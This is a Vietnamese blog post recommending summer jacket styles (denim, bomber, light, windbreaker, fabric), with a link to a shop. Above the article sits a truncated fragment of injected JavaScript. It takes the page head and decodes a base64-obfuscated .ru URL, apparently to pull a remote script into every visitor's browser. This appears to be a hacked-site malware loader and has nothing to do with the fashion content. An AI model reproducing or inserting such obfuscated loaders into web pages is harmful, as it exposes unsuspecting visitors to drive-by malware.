(function(){var a=document.head||document.getElementsByTagName("head")[0],b=atob("aHR0cHM6Ly9hZGlxd2VuZGoudHcxLnJ1Lw==");b+=-1

Những mẫu áo khoác cho mùa hè

brooklyn, fashion, style, women

Những mẫu áo khoác cho mùa hè
Những mẫu áo khoác cho mùa hèMùa hè là mùa có thời tiết cực nắng vậy bạn nên chọn những mẫu áo khoác nào thích hợp để ra ngoài vào mùa hè, hãy cùng mình tìm hiểu trong bài viết dưới đây nhé.

1. Áo khoác denim:

Những chiếc áo khoác denim nhẹ là một lựa chọn thuận tiện và phổ biến cho mùa hè. Chúng có thể được kết hợp với mọi trang phục bên trong, từ áo phông đơn giản tuyệt vời cho mùa hè. Chúng có thể được đặt lên áo thun hoặc váy để tạo ra một trang phục thời trang và thoải mái.

Những mẫu áo khoác cho mùa hè

2. Áo khoác bomber:

Áo khoác bomber nhẹ làm bằng vải mỏng là lựa chọn hoàn hảo cho mùa hè. Chúng có thể được đặt lên quần jean và áo thun cho một phong cách nam tính hay váy và giày cao gót cho một phong cách nữ tính.
Những mẫu áo khoác cho mùa hè

3. Áo khoác nhẹ:

Một chiếc áo khoác nhẹ làm bằng chất liệu mỏng giúp giữ ấm vào ban đêm mà không gây nóng bức trong ban ngày. Chúng có thể được đặt lên áo thun hoặc váy để tạo ra một trang phục đơn giản và thoải mái.
Những mẫu áo khoác cho mùa hè

4. Áo khoác gió:

Áo khoác gió với thiết kế thoải mái và kiểu dáng trang trí thường là một lựa chọn phù hợp cho mùa hè. Chúng có thể được đặt lên trang phục đơn giản để tạo ra một phong cách cá tính.
Những mẫu áo khoác cho mùa hè

5. Áo khoác vải:

Áo khoác vải nhẹ có thể được đặt lên áo thun và quần jean để tạo ra một phong cách đơn giản và trẻ trung. Chúng cũng có thể được đặt lên váy để tạo ra một phong cách nữ tính.

Những mẫu áo khoác cho mùa hèLink trang web có bán sản phẩm trên: https://hoadaingantaynguyen.com/

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *